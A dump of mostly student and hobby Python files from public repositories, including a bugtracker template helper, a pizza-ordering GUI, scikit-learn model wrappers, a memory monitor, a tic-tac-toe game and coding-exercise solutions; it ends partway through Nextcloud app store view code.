os\n\nimport web\n\nfrom jinja2 import Environment,FileSystemLoader\n\ndef plrl(s1, s2, f):\n if f > 1:\n return s2\n else:\n return s1\n\ndef timesince(d, now=None):\n chunks = (\n (60 * 60 * 24 * 365, lambda n: plrl('year', 'years', n)),\n (60 * 60 * 24 * 30, lambda n: plrl('month', 'months', n)),\n (60 * 60 * 24 * 7, lambda n : plrl('week', 'weeks', n)),\n (60 * 60 * 24, lambda n : plrl('day', 'days', n)),\n (60 * 60, lambda n: plrl('hour', 'hours', n)),\n (60, lambda n: plrl('minute', 'minutes', n))\n )\n # Convert datetime.date to datetime.datetime for comparison.\n if not isinstance(d, datetime.datetime):\n if not isinstance(d, datetime.date):\n d = datetime.datetime.strptime(d, \"%Y-%m-%d %H:%M:%S\")\n else:\n d = datetime.datetime(d.year, d.month, d.day)\n if now and not isinstance(now, datetime.datetime):\n now = datetime.datetime(now.year, now.month, now.day)\n\n if not now:\n now = datetime.datetime.now()\n\n # ignore microsecond part of 'd' since we removed it from 'now'\n delta = now - (d - datetime.timedelta(0, 0, d.microsecond))\n since = delta.days * 24 * 60 * 60 + delta.seconds\n if since <= 0:\n # d is in the future compared to now, stop processing.\n return u'0 ' + 'minutes'\n for i, (seconds, name) in enumerate(chunks):\n count = since // seconds\n if count != 0:\n break\n s = '%(number)d %(type)s' % {'number': count, 'type': name(count)}\n if i + 1 < len(chunks):\n # Now get the second item\n seconds2, name2 = chunks[i + 1]\n count2 = (since - (seconds * count)) // seconds2\n if count2 != 0:\n s += ', %(number)d %(type)s' % {'number': count2, 'type': name2(count2)}\n return s\n\ndef markdown(text):\n import markdown2\n\n link_patterns = [\n (re.compile(\"#(\\d+)\"), r\"/issue/\\1\"),\n (re.compile(r\"\\B@(\\w+)\"), r\"/user/\\1\"),\n (re.compile(\"rev:(\\w{6})\"), r\"/source/browse/?rev=\\1\"),\n ]\n return markdown2.markdown(text, extras=[\"cuddled-lists\", \"link-patterns\"], link_patterns=link_patterns)\n\ndef priority_string(p):\n if (p == 1):\n return \"Critical\"\n elif (p == 2):\n return \"High\"\n elif (p == 3):\n return \"Medium\"\n elif (p == 4):\n return \"Low\"\n return \"-\"\n\ndef status_string(s):\n if (s == 0):\n return \"Open\"\n elif (s == 1):\n return \"Closed\"\n return \"-\"\n\ndef avatar(user):\n return \"/static/upload/avatars/%s.png\" % user.id\n\nclass render_jinja:\n\n def __init__(self, *a, **kwargs):\n extensions = kwargs.pop('extensions', [])\n globals = kwargs.pop('globals', {})\n\n self._templ_sub_dir = ''\n\n self._lookup = Environment(loader=FileSystemLoader(*a, **kwargs), extensions=extensions)\n self._lookup.filters['timesince'] = timesince\n self._lookup.filters['markdown'] = markdown\n self._lookup.filters['priority_string'] = priority_string\n self._lookup.filters['status_string'] = status_string\n self._lookup.filters['avatar'] = avatar\n self._lookup.globals.update(globals)\n\n def __getattr__(self, name):\n if self._templ_sub_dir != '':\n name = self._templ_sub_dir + \"/\" + name\n if os.path.exists('./templates/%s/' % name):\n self._templ_sub_dir = name\n return self\n else:\n self._templ_sub_dir = ''\n path = name + '.html'\n t = self._lookup.get_template(path)\n return t.render\n\nrender = render_jinja('templates', encoding='utf-8', globals=web.template.Template.globals, )\n\n\n","repo_name":"cenan/bugtracker","sub_path":"helpers/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31134265058","text":"# Good morning! Here's your coding interview problem for today.\n\n# This problem was asked by Apple.\n\n# Implement a job scheduler which takes in a function f and an integer n, and calls f after n milliseconds.\n# Soln: https://sathishbabu96n.medium.com/daily-coding-problem-problem-10-da50b93bfc67 \n\nimport time\ndef scheduler(f, n):\n time.sleep(n)\n f()\n\n\nfrom time import sleep, time\nimport heapq, threading\n\nclass Scheduler:\n def __init__(self):\n self.functions = []\n thread = threading.Thread(target=self._poll)\n thread.start()\n def _poll(self):\n while True:\n now = time() * 1000\n if len(self.functions) > 0:\n due, func, args, kwargs = self.functions[0]\n if now > due:\n func(*args, **kwargs)\n self.functions = [(due, func, args, kwargs) for due, func, args, kwargs in self.functions if due < now]\n sleep(0.01)\n def schedule(self, func, n, *args, **kwargs):\n heapq.heappush(self.functions, (n + time() * 1000, func, args, kwargs))","repo_name":"jfur1/daily-coding-problem","sub_path":"08-2022/08-20-2022.py","file_name":"08-20-2022.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42106242437","text":"#name Osamah Jawad\n##class Sdev 140\n#profname Nick LaPlante\n##date December 18 2022\n#PIZZA GUI APP\n#using PIL for the pictures\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\n\n\n#creating tkinter window\ndef print_selected_items():\n\n for i in Pizza_List.curselection():\n print(Pizza_List.get(i))\n print(drinks.get())\nPizza = Tk()\n\ndef call_back_add_pizza():\n print(\"*********Def add Pizza\")\n print_selected_items()\n\nPizza.geometry(\"700x600\")\nPizza.title(\"MY Pizza App\")\n# Create the textboxes\n# the purpose here is to add the customers info to the system\nname_Label = Label(Pizza, text=\"Type your name? \")\nname_Label.grid(row=0, column=0)\n\nname_entry = Entry(Pizza, width=25)\nname_entry.grid(row=0, column=1)\n# the purpose for this box to adding the custome address\naddress_Label = Label(Pizza, text=\"Type your address? \")\naddress_Label.grid(row=1, column=0)\n\naddress_entry = Entry(Pizza, width=25)\naddress_entry.grid(row=1, column=1)\n# the purpose for this box to adding the custome phone number\nphone_Label = Label(Pizza, text=\"Enter your phone number? \")\nphone_Label.grid(row=2, column=0)\n\nphone_entry = Entry(Pizza, width=25)\nphone_entry.grid(row=2, column=1)\n\n#Our Pizza list\n# the purpose for this box to let the customers pick the topping of thr pizza\nmy_Pizza_List = [\"Cheese\", \"Veggie\", \"Pepperoni\", \"Mushroom\", \"Chicken\", \"Beef\", \"Olive\", \"Steak\"]\n\n\n\nPizza_List = Listbox(Pizza, selectmode=MULTIPLE, bg=\"white\", fg=\"black\")\nPizza_List.grid(row=4, column=1)\n\nfor item in my_Pizza_List:\n Pizza_List.insert(0, item)\n#Create button\n# the purpose for this buttom to adding the pizza to the order list\nadd_button = Button(Pizza, text=\"Add pizza\",command = call_back_add_pizza)\nadd_button.grid(row=5,column=0)\n\n# the purpose for this buttom to shows the the customers info\ndef check():\n text1 = name_entry.get()\n new_lbl = Label(Pizza, text=\"Name: \" + text1)\n new_lbl.grid(row=5,column=2)\n\n text2 = address_entry.get()\n new_lbl2 = Label(Pizza, text=\"Address\" + text2)\n new_lbl2.grid(row=6,column=2)\n\n text3 = phone_entry.get()\n new_lbl3 = Label(Pizza, text=\"Phone Number\" + text3)\n new_lbl3.grid(row=7,column=2)\n \n\n \nPizza_Options = StringVar()\nPizza_Options.set(\"Choose a Pizza\")\n\n#the drink mune (coca,Fanta,Root Beer,Sprite,Lemaonade) \n# the purpose for this buttom to shows the the customers all the drinks option that i offer to them\nmenu = OptionMenu(Pizza, Pizza_Options, \"coca\", \"Fanta\", \"Root Beer\", \"Sprite\", \"Lemaonade\",)\n\ndrinks = StringVar()\ndrinks.set(\"Choose a drink\")\n\n\n# the drinks list \ndrink = OptionMenu(Pizza, drinks, \"coca\", \"Fanta\", \"Root Beer\", \"Sprite\", \"Lemaonade\",)\n \n##this buttom will appear all the customers information such as name, email, phone number\ncheck_button = Button(Pizza, text=\"Checkout\", command=check)\ncheck_button.grid(row=6,column=0)\n#this bottom allow the customers to delete the pizza if want to change the topping\ndef deleteme():\n Pizza_List.delete(0,7)\n\ndel_button = Button(Pizza, text=\"Delete Pizza\", command=deleteme)\ndel_button.grid(row=7,column=0)\n#this bottom allow the customers to pick the type of the drink\ndrinks = StringVar()\ndrinks.set(\"Choose a drink\")\n\ndrink = OptionMenu(Pizza, drinks, \"coca\", \"Fanta\", \"Root Beer\", \"Sprite\", \"Lemaonade\",) # add a command here to print the value to the screen\ndrink.grid(row=8,column=0)\n#here adding picture number1 using PIL\nimg = Image.open(\"pizza.png.jpg\")\nimg = img.resize((180, 180))\npizza_pic = ImageTk.PhotoImage(img)\nlabel = Label(Pizza, image=pizza_pic)\nlabel.image = pizza_pic\n\nlabel.place(x=450, y=20)\n##here adding picture number2 using PIL\nimg = Image.open(\"Pizza23.png\")\nimg = img.resize((180, 180))\npizza_pic = ImageTk.PhotoImage(img)\nlabel = Label(Pizza, image=pizza_pic)\nlabel.image = pizza_pic\n\nlabel.place(x=450, y=400)\n\n#exit buttom\n# the purpose of the buttom to let the customers exit the app if the y done with the order\ndef exitout():\n answer = messagebox.askyesno(\"Exit\", \"Are you sure, you want to exit?\")\n if answer == 1:\n Pizza.destroy()\n else:\n return\n\nexit_button = Button(Pizza, text=\"Exit out\", command=exitout)\nexit_button.grid(row=1, column=7)\n\n\n\nPizza.mainloop()\n","repo_name":"ojawad/Osamah-Jawad-Final-Project","sub_path":"PIZZA GUI APP.py","file_name":"PIZZA GUI APP.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73882145670","text":"#!/usr/bin/python\n# \n# Various ML models from scikit-learn\n#\n# includes:\n# LogisticRegression\n# SVM\n# KNN\n# NaiveBayes\n# Perceptron (1-layer NN)\n# Linear SVC\n# SGD\n# Decision Tree\n# Random Forest\n#\n# Author: Chaney Lin\n# Date: April 2018\n#\nimport pandas as pd\n\ndef runModel(model, X_train, Y_train, X_test):\n \"\"\"\n performs fitting of [model] using [X_train] and [Y_train]\n returns accuracy on training set, and predictions on [X_test]\n \"\"\"\n model.fit(X_train, Y_train)\n Y_pred = model.predict(X_test)\n accuracy = round(model.score(X_train, Y_train) * 100, 2)\n return accuracy, Y_pred\n\ndef runLogisticRegression(X_train, Y_train, X_test):\n \"\"\"\n runs logistic regression\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.linear_model import LogisticRegression\n \n logreg = LogisticRegression()\n return runModel(logreg, X_train, Y_train, X_test)\n\ndef runSVM(X_train, Y_train, X_test):\n \"\"\"\n runs support vector machine\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.svm import SVC\n \n svc = SVC()\n return runModel(svc, X_train, Y_train, X_test)\n\ndef runKNN(X_train, Y_train, X_test, n_neighbors = 3):\n \"\"\"\n runs K-nearest neighbors (input K)\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.neighbors import KNeighborsClassifier\n \n knn = KNeighborsClassifier(n_neighbors = n_neighbors)\n return runModel(knn, X_train, Y_train, X_test)\n\ndef runNaiveBayes(X_train, Y_train, X_test):\n \"\"\"\n runs Naive Bayes\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.naive_bayes import GaussianNB\n \n gaussian = GaussianNB()\n return runModel(gaussian, X_train, Y_train, X_test)\n\ndef runPerceptron(X_train, Y_train, X_test):\n \"\"\"\n runs Perceptron (i.e. single layer NN)\n returns accuracy on training set, and predictions\n \"\"\"\n\n from sklearn.linear_model import Perceptron\n\n perceptron = Perceptron()\n return runModel(perceptron, X_train, Y_train, X_test)\n\ndef runLinearSVC(X_train, Y_train, X_test):\n \"\"\"\n runs linear SVC\n returns accuracy on training set, and predictions\n \"\"\"\n\n from sklearn.svm import SVC, LinearSVC\n\n linear_svc = LinearSVC()\n return runModel(linear_svc, X_train, Y_train, X_test)\n\ndef runSGD(X_train, Y_train, X_test):\n \"\"\"\n runs stochastic gradient descent\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.linear_model import SGDClassifier\n\n sgd = SGDClassifier()\n return runModel(sgd, X_train, Y_train, X_test)\n\ndef runDecisionTree(X_train, Y_train, X_test):\n \"\"\"\n runs decision tree\n returns accuracy on training set, and predictions\n \"\"\"\n\n from sklearn.tree import DecisionTreeClassifier\n\n decision_tree = DecisionTreeClassifier()\n return runModel(decision_tree, X_train, Y_train, X_test)\n\ndef runRandomForest(X_train, Y_train, X_test, n_estimators = 300):\n \"\"\"\n runs random forest with [n_estimators] estimators\n returns accuracy on training set, and predictions\n \"\"\"\n\n from sklearn.ensemble import RandomForestClassifier\n\n random_forest = RandomForestClassifier(n_estimators=300)\n return runModel(random_forest, X_train, Y_train, X_test)\n\ndef runAll(X_train, Y_train, X_test, n_neighbors = 3, n_estimators = 300):\n \"\"\"\n runs all models\n optional inputs are number of neighbors (for KNN) and number of estimators (for random forest)\n \"\"\"\n\n modelnames = ['Support Vector Machines', 'KNN', 'Logistic Regression', \n 'Random Forest', 'Naive Bayes', 'Perceptron', \n 'Stochastic Gradient Decent', 'Linear SVC', \n 'Decision Tree']\n\n acc = []\n pred = []\n\n svm = runSVM(X_train, Y_train, X_test)\n knn = runKNN(X_train, Y_train, X_test, n_neighbors = n_neighbors)\n logreg = runLogisticRegression(X_train, Y_train, X_test)\n random_forest = runRandomForest(X_train, Y_train, X_test, n_estimators = n_estimators)\n naive_bayes = runNaiveBayes(X_train, Y_train, X_test)\n perceptron = runPerceptron(X_train, Y_train, X_test)\n sgd = runSGD(X_train, Y_train, X_test)\n linear_svc = runLinearSVC(X_train, Y_train, X_test)\n decision_tree = runDecisionTree(X_train, Y_train, X_test)\n\n for results in [svm, knn, logreg, random_forest, naive_bayes, perceptron, sgd, linear_svc, decision_tree]:\n acc.append(results[0])\n pred.append(results[1])\n\n models = pd.DataFrame({\n 'Model': modelnames,\n 'Score': acc,\n 'Predictions': pred})\n\n return models.sort_values(by='Score', ascending=False)","repo_name":"clin-projects/kaggle-titanic","sub_path":"ML_models.py","file_name":"ML_models.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36623667272","text":"from sys import argv\n\nscript, user_name = argv\nprompt = '>'\n\nprint(user_name, script)\nprint(\"Do you like me \" + user_name + \"?\")\nlikes = input(prompt)\n\nprint(\"Where do you live \" + user_name + \"?\")\nlives = input(prompt)\n\nprint(\"\"\"\nSo you said {:s} about liking me.\nYou live in {:s}.\n\"\"\".format(likes, lives))\n\nprint(\"Script: \", script)\n\nage = int(input(\"Age? \"))\nprint(\"Age*2: \", age*2)\n\n\n","repo_name":"mrkajetanp/learning-programming","sub_path":"Python/Learning/Language/arg_ex.py","file_name":"arg_ex.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"37203168778","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 26 14:53:47 2019\n\n@author: ZR\n\nThis Code will supervise Memory usage of Operation System. If less than 5% memory usable, this code will force logout current user.\n\"\"\"\n\n\nfrom psutil import virtual_memory\nimport time\nimport os\n\nmem = virtual_memory()\nusage_percent = mem.percent\nf = open('Log_File.txt','w')\n\nwhile 1:\n f = open('Log_File.txt','a')\n print('Current Used Memory Percent is:'+str(usage_percent)+'%')\n f.write(str(usage_percent)+'\\n')\n time.sleep(1)\n if usage_percent>95:\n now = int(round(time.time()*1000))\n now_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(now/1000))\n print('Memory Out!! Logging User Out at '+now_time)\n f.close()\n os.system(\"shutdown -l\")\n else:\n f.close()","repo_name":"adolescent/2P_Analysis","sub_path":"Other_Usage_Codes/Memory_Safety/Memory_Police.py","file_name":"Memory_Police.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"74125655431","text":"import csv\n\ndef PAVaccines(zip2): \n sites = []\n finalSites = \"Your nearest vaccination site(s) are: \"\n with open('PAData.csv', mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n line_count = 0\n for row in csv_reader:\n zipCode = row[\"ZIP Code\"]\n if(int(zipCode) == int(zip2)):\n sites.append(row[\"Clinic Name\"].capitalize() + \": \" + row[\"Street Address\"] + \" \" + row[\"City\"] + \", PA \" + row[\"ZIP Code\"])\n #print(sites)\n num = 0 \n sites2 = [\"N/A\",\"N/A\",\"N/A\"] \n while num < 3: \n if(num > len(sites)-1): \n break\n sites2[num] = sites[num]\n num+=1\n return sites2\n","repo_name":"kshah2020/COVID19-Chatbot","sub_path":"csvreader.py","file_name":"csvreader.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1825197999","text":"\ngameArr = ['-', '-', '-', '-', '-', '-', '-', '-', '-']\ncorr = {\n '1 1': 0,\n '1 2': 1,\n '1 3': 2,\n '2 1': 3,\n '2 2': 4,\n '2 3': 5,\n '3 1': 6,\n '3 2': 7,\n '3 3': 8,\n}\n\n\ndef game():\n player1 = input('Saisir le nom du joueur 1: ')\n player1figure = 'Croix'\n player2 = input('Saisir le nom du joueur 2: ')\n player2figure = 'Ronds'\n\n print('Joueur 1: ' + player1figure + ': ' + player1 )\n print('Joueur 2: ' + player2 + '. ' + player2figure) \n \n currentPlayer = ''\n \n for i in range(len(gameArr)):\n if i == 2 or i == 5:\n print(gameArr[i])\n else:\n print(gameArr[i], end=\" \")\n\n while True: \n isPlayer1 = currentPlayer == player2 or currentPlayer == \"\"\n currentPlayer = player1 if isPlayer1 else player2 \n \n turn = input(currentPlayer + ' joue: ')\n for key in corr:\n if turn not in corr:\n turn = input('Merci de saisir le nombre correct!')\n if key == turn:\n if gameArr[corr[key]] == 'X' or gameArr[corr[key]] == 'O':\n turn = input('Cette case a déjà été utilisée!!!')\n else:\n gameArr[corr[key]] = 'X' if currentPlayer == player1 else 'O'\n \n for i in range(len(gameArr)):\n if i == 2 or i == 5:\n print(gameArr[i])\n else:\n print(gameArr[i], end=\" \") \n\n if didSmbWin(gameArr):\n break \n\n print(currentPlayer + ' wins!!!')\n writeInFile(currentPlayer) \n \ndef didSmbWin(array):\n if (array[0] == array[1] == array[2] == 'X' or\n array[0] == array[1] == array[2] == 'O'):\n return True\n elif (array[0] == array[3] == array[6] == 'X' or\n array[0] == array[3] == array[6] == 'O'):\n return True\n elif (array[0] == array[4] == array[8] == 'X' or\n array[0] == array[4] == array[8] == 'O'):\n return True\n elif (array[1] == array[4] == array[7] == 'X' or\n array[1] == array[4] == array[7] == 'O'):\n return True\n elif (array[2] == array[5] == array[8] == 'X' or\n array[2] == array[5] == array[8] == 'O'):\n return True\n elif (array[2] == array[4] == array[6] == 'X' or\n array[2] == array[4] == array[6] == 'O'):\n return True\n elif (array[3] == array[4] == array[5] == 'X' or\n array[3] == array[4] == array[5] == 'O'):\n return True\n elif (array[6] == array[7] == array[8] == 'X' or\n array[6] == array[7] == array[8] == 'O'):\n return True\n\ndef writeFile(user):\n with open(\"./files/morpion.txt\", 'r+') as file:\n lines = file.readlines() \n\n def changeItem(item):\n dividedLine = item.split(\" \")\n if dividedLine[0] == user: \n victoriesNumber = int(dividedLine[1]) \n victoriesNumber += 1 \n newline = dividedLine[0] + ' ' + str(victoriesNumber) + ' \\n'\n return newline\n else:\n return item \n \n newLines = \"\".join(list(map(changeItem, lines))) \n file.close()\n\n newFile = open(\"./files/morpion.txt\", 'wt')\n newFile.write(newLines)\n newFile.close()\n\ndef writeInFile(user):\n with open(\"./files/morpion.txt\", 'r+') as file:\n text = file.readlines()\n\n userExists = False\n for i in text:\n userName = i.split(\" \") \n if userName[0] == user:\n userExists = True\n \n if userExists:\n writeFile(user)\n else:\n file.write(user + ' 1 ' + '\\n')\n\n\ngame()","repo_name":"Evgvakh/starter-python","sub_path":"runtrack_project/morpion.py","file_name":"morpion.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1123995601","text":"#!/usr/bin/env python3\nimport os\nimport statistics\nfrom sys import argv\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\n\n'''-----------------------------------------------'''\n\ndef load_hist(filename):\n\thist = {}\n\n\tdata = {}\n\tn = 0; sum_ = 0\n\twith open(filename) as fh:\n\t\tfor line in fh:\n\t\t\tk, v = [ int(i) for i in line.split() ]\n\t\t\tdata[k] = v\n\t\t\tn += v; sum_ += k*v\n\n\tmean = sum_/n\n\tsq_sum = 0\n\tfor time in data:\n\t\tsq_sum += ((time-mean)**2)*data[time]\n\tstdev = (sq_sum / n)**0.5\n\n\thist['metadata'] = {}\n\thist['metadata']['avg'] = mean\n\thist['metadata']['stdev'] = stdev\n\n\thist['data'] = {}\n\thist['data']['filtered'] = {}\n\thist['data']['outliers'] = {}\n\tfor time in data:\n\t\tif time <= mean + 3*stdev or time <= mean - 3*stdev:\n\t\t\thist['data']['filtered'][time] = data[time]\n\t\telse:\n\t\t\thist['data']['outliers'][time] = data[time]\n\n\treturn hist\n\ndef trunc_str(f):\n\treturn \"%.2f\" % f\n\n'''-----------------------------------------------'''\n\ntry:\n\tresult_dir = argv[1]\n\tcside_sysA = argv[2]\n\tjside_sysA = argv[3]\n\tcside_sysB = argv[4]\n\tjside_sysB = argv[5]\nexcept IndexError:\n\tprint(\"usage:\", argv[0], \"result_dir cside-systemA javaside-systemA cside-systemB javaside-systemB\")# \")\n\texit(2)\n\nc = 'limegreen'\ne = 'black'\na = .9\n\nrectangle1 = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False, edgecolor='none', linewidth=0)\nrectangle2 = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False, edgecolor='none', linewidth=0)\n\ncside_sysA = load_hist(cside_sysA)\njside_sysA = load_hist(jside_sysA)\ncside_sysB = load_hist(cside_sysB)\njside_sysB = load_hist(jside_sysB)\n\nfig = plt.figure(constrained_layout=True)\nsubfigs = fig.subfigures (\n\tnrows=2,\n\tncols=1\n)\n\nsubfigs[0].suptitle('System A')\naxs = subfigs[0].subplots(nrows=1, ncols=2, sharex=True, sharey=True)\naxs[0].bar (\n\tcside_sysA['data']['filtered'].keys(),\n\tcside_sysA['data']['filtered'].values(),\n\tcolor = c, edgecolor = e, alpha = a\n)\naxs[0].legend ( \\\n\t[ \\\n\t\trectangle1, \\\n\t\trectangle2 \\\n\t], \\\n\t( \\\n\t\t\"x̄: \"+trunc_str(cside_sysA['metadata'] ['avg'] )+\" µsec\", \\\n\t\t\"σ: \"+trunc_str(cside_sysA['metadata']['stdev'])+\" µsec\" \\\n\t) \\\n)\naxs[0].set_title(\"C\")\naxs[1].bar (\n\tjside_sysA['data']['filtered'].keys(),\n\tjside_sysA['data']['filtered'].values(),\n\tcolor = c, edgecolor = e, alpha = a\n)\naxs[1].legend ( \\\n\t[ \\\n\t\trectangle1, \\\n\t\trectangle2 \\\n\t], \\\n\t( \\\n\t\t\"x̄: \"+trunc_str(jside_sysA['metadata'] ['avg'] )+\" µsec\", \\\n\t\t\"σ: \"+trunc_str(jside_sysA['metadata']['stdev'])+\" µsec\" \\\n\t) \\\n)\naxs[1].set_title(\"Java\")\n\n\n\nsubfigs[1].suptitle('System B')\naxs = subfigs[1].subplots(nrows=1, ncols=2, sharex=True, sharey=True)\naxs[0].bar (\n\tcside_sysB['data']['filtered'].keys(),\n\tcside_sysB['data']['filtered'].values(),\n\tcolor = c, edgecolor = e, alpha = a\n)\naxs[0].legend ( \\\n\t[ \\\n\t\trectangle1, \\\n\t\trectangle2 \\\n\t], \\\n\t( \\\n\t\t\"x̄: \"+trunc_str(cside_sysB['metadata'] ['avg'] )+\" µsec\", \\\n\t\t\"σ: \"+trunc_str(cside_sysB['metadata']['stdev'])+\" µsec\" \\\n\t) \\\n)\naxs[0].set_title(\"C\")\naxs[1].bar (\n\tjside_sysB['data']['filtered'].keys(),\n\tjside_sysB['data']['filtered'].values(),\n\tcolor = c, edgecolor = e, alpha = a\n)\naxs[1].legend ( \\\n\t[ \\\n\t\trectangle1, \\\n\t\trectangle2 \\\n\t], \\\n\t( \\\n\t\t\"x̄: \"+trunc_str(jside_sysB['metadata'] ['avg'] )+\" µsec\", \\\n\t\t\"σ: \"+trunc_str(jside_sysB['metadata']['stdev'])+\" µsec\" \\\n\t) \\\n)\naxs[1].set_title(\"Java\")\n\nfig.supxlabel('Run Time (usec)')\nfig.supylabel('Frequency')\n\nplt.savefig(\n\tos.path.join(\n\t\tresult_dir,\n\t\t'juxtaposed_compound'\n\t)\n)\n#\n# fig, axs = plt.subplots(1, 2, figsize=(10,5))\n#\n# rectangle1 = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False, edgecolor='none', linewidth=0)\n# rectangle2 = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False, edgecolor='none', linewidth=0)\n#\n# axs[0].bar (\n# \tcside['data']['filtered'].keys(),\n# \tcside['data']['filtered'].values(),\n# \tcolor = c, edgecolor = e, alpha = a\n# )\n# axs[0].legend (\n# \t[\n# \t\trectangle1,\n# \t\trectangle2\n# \t],\n# \t(\n# \t\t\"x̄: \"+trunc_str(cside['metadata'] ['avg'] )+\" µsec\",\n# \t\t\"σ: \"+trunc_str(cside['metadata']['stdev'])+\" µsec\"\n# \t)\n# )\n# axs[0].set_title(\"C\")\n#\n# axs[1].bar (\n# \tjavaside['data']['filtered'].keys(),\n# \tjavaside['data']['filtered'].values(),\n# \tcolor = c, edgecolor = e, alpha = a\n# )\n# axs[1].legend (\n# \t[\n# \t\trectangle1,\n# \t\trectangle2\n# \t],\n# \t(\n# \t\t\"x̄: \"+trunc_str(javaside['metadata'] ['avg'] )+\" µsec\",\n# \t\t\"σ: \"+trunc_str(javaside['metadata']['stdev'])+\" µsec\"\n# \t)\n# )\n# axs[1].set_title(\"Java\")\n# axs[1].set_yticks(axs[0].get_yticks()) # align y axis idiom\n#\n# fig.supxlabel('Time (μs)')\n# fig.supylabel('Frequency')\n#\n# # plt.show(); exit();\n\n\n\n\n","repo_name":"aservet1/jRAPL","sub_path":"tests/jmh/native-related-runtime/scripts/juxtopose-cside-javaside_compoundplots.py","file_name":"juxtopose-cside-javaside_compoundplots.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"2166911201","text":"\r\nstart = 1\r\nend = 100\r\ncountersteps = 1\r\n\r\nfor i in range(start, end, countersteps):\r\n\r\n if i % 3 == 0:\r\n print(str(i) + \" Fizz alfred yoyooyo\")\r\n \r\n if i % 5 == 0:\r\n print(str(i) + \" Buzz stein yoyoyoyo\")\r\n\r\n else:\r\n print(i)","repo_name":"ivers1en/Prosjekt_A","sub_path":"Teller1til100_sjekker3og5medModulo%.py","file_name":"Teller1til100_sjekker3og5medModulo%.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39918443833","text":"valorT=0\ncontador=0\nvalor=1\nwhile valor != 0:\n valor = float(input(\"Digite numero par:\"))\n if valor%2 ==0:\n contador +=1\n valorT=valorT+valor\n else: \n print (\"Isso é impar\")\n\nmedia= valorT/(contador-1)\nprint(media)\n","repo_name":"JuanSoftware/Lista_3","sub_path":"lista 3/Q7.py","file_name":"Q7.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8726417103","text":"class Solution:\n def longestValidParentheses(self, s: str) -> int:\n res = 0\n stack = []\n \n stack.append(-1)\n for i, char in enumerate(s):\n if char == '(':\n stack.append(i);\n else:\n #if encounter ) and stack becomes empty means invalid so we start a new substring search\n stack.pop()\n if not stack:\n stack.append(i)\n else:\n res = max(res, i-stack[-1])\n \n return res\n","repo_name":"b-knd/competitive-programming","sub_path":"practice/leetcode/32_LongestValidParentheses.py","file_name":"32_LongestValidParentheses.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73887344712","text":"from urllib.parse import urlencode\n\nfrom django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import get_language, get_language_info\nfrom django.views.decorators.http import etag\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom rest_framework.generics import ListAPIView\nfrom semantic_version import Version\n\nfrom nextcloudappstore.core.caching import app_etag\nfrom nextcloudappstore.core.facades import flatmap\nfrom nextcloudappstore.core.forms import (\n AppRatingForm,\n AppRegisterForm,\n AppReleaseUploadForm,\n)\nfrom nextcloudappstore.core.models import App, AppRating, Category\nfrom nextcloudappstore.core.serializers import AppRatingSerializer\nfrom nextcloudappstore.core.versioning import pad_min_version\n\n\n@etag(app_etag)\ndef app_description(request, id):\n app = get_object_or_404(App, id=id)\n return HttpResponse(app.description, content_type=\"text/plain\")\n\n\nclass AppRatingApi(ListAPIView):\n serializer_class = AppRatingSerializer\n\n def get_queryset(self):\n id = self.kwargs.get(\"id\")\n lang = self.request.GET.get(\"lang\", self.request.LANGUAGE_CODE)\n app = get_object_or_404(App, id=id)\n queryset = AppRating.objects.language(lang).filter(app=app)\n\n current_user = self.request.GET.get(\"current_user\", \"false\")\n if current_user == \"true\":\n return queryset.filter(user=self.request.user)\n else:\n return queryset\n\n\nclass AppDetailView(DetailView):\n queryset = App.objects.prefetch_related(\n \"releases\",\n \"screenshots\",\n \"co_maintainers\",\n \"translations\",\n ).select_related(\"owner\")\n template_name = \"app/detail.html\"\n slug_field = \"id\"\n slug_url_kwarg = \"id\"\n\n def 